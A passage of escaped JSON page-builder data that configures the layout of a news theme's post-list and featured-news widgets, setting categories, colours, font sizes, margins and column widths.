,\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"1\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#266cc9\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"78.5\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"510\",\"category_bg_color\":\"#c9975f\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ea7441\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#e5e100\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"pzcs9rp\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":\"1170\"},\"gap\":\"no\",\"structure\":\"20\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"30\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"gifizg0\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":\"65.004\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"ik44uj8\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technlogie\",\"size\":\"medium\",\"align\":\"left\",\"title_color\":\"#038fc6\",\"typography_font_size\":{\"unit\":\"px\",\"size\":1}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"wnhjaaz\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"category\":[\"10\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.5)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#00c5b5\",\"post_list1_category_background_hov_color\":\"#00c5b5\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"24\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"post_list1_meta_title_hov_color\":\"#00c5b5\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"-5\",\"bottom\":\"0\",\"left\":\"-5\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"},{\"id\":\"3j25kle\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"20\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"q18cnb8\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"o6ou2yp\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"4\",\"offset\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_color1_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_color2_post_list_1\":\"rgba(0,0,0,0.6)\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size\":{\"unit\":\"px\",\"size\":\"10\"},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_size_mobile\":{\"unit\":\"px\",\"size\":12},\"post_list_1_category_font_weight_tablet\":\"600\",\"post_list_1_category_font_weight_mobile\":\"600\",\"typhography_title_post_list_1_hov_color\":\"#aaaaaa\",\"post_list_1_title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.25},\"post_list_1_title_font_size\":{\"unit\":\"px\",\"size\":\"14\"},\"post_list_1_title_font_size_tablet\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_size_mobile\":{\"unit\":\"px\",\"size\":24},\"post_list_1_title_font_weight\":\"700\",\"post_list_1_title_font_weight_tablet\":\"600\",\"post_list_1_title_font_weight_mobile\":\"600\",\"use_meta_post_list_1\":\"\",\"post_list1_meta_title_hov_color\":\"#aaaaaa\",\"post_list_1_meta_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"post_list_1_meta_font_weight_tablet\":\"600\",\"post_list_1_meta_font_weight_mobile\":\"600\",\"use_excerpt_post_list_1\":\"\",\"post_list_1_excerpt_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_excerpt_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list_1_excerpt_word\":\"10\",\"use_read_more_post_list_1\":\"\",\"post_list1_read_more_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list1_read_more_font_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_list1_read_more_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_size_mobile\":{\"unit\":\"px\",\"size\":18},\"post_list1_read_more_font_weight_tablet\":\"400\",\"post_list1_read_more_font_weight_mobile\":\"400\",\"section_magzma_post_list_1_column_control\":\"\",\"horizontal_use\":\"left\",\"width\":\"600\",\"height\":\"395\",\"horizontal_col_select\":\"column-2\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"use_padding\":\"use\",\"padding_size_list_style_1\":{\"unit\":\"px\",\"size\":\"10\"},\"padding_size_list_style_1_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_list_style_1_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_post_list_animation_control\":\"\",\"animate\":\"fadeIn\",\"_section_style\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"-15\",\"isLinked\":false},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-post-list-1\"}],\"isInner\":true},{\"id\":\"wg2jk1s\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"e37o4qh\",\"elType\":\"widget\",\"settings\":{\"section_magzma_post_list\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"loop_infinite_class\":\"loop-infinte-list-1\",\"section_magzma_post_list_1_typhography_title\":\"\",\"post_icon_size_post_list_1_tablet\":{\"unit\":\"px\",\"size\":18},\"post_icon_size_post_list_1_mobile\":{\"unit\":\"px\",\"size\":18},\"post_icon_padding_post_list_1_tablet\":{\"unit\":\"px\",\"size\":10},\"post_icon_padding_post_list_1_mobile\":{\"unit\":\"px\",\"size\":10},\"use_view_post_list_1\":\"\",\"post_list_1_view_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_view_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"post_list_1_view_font_weight_tablet\":\"600\",\"post_list_1_view_font_weight_mobile\":\"600\",\"typhography_category_post_list_1_background_color\":\"#ea7441\",\"post_list1_category_background_hov_color\":\"#ea7441\",\"post_list_1_category_line_height_tablet\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_line_height_mobile\":{\"unit\":\"em\",\"size\":1.5},\"post_list_1_category_font_size_tablet\":{\"unit\":\"px\",\"size\":12},\"p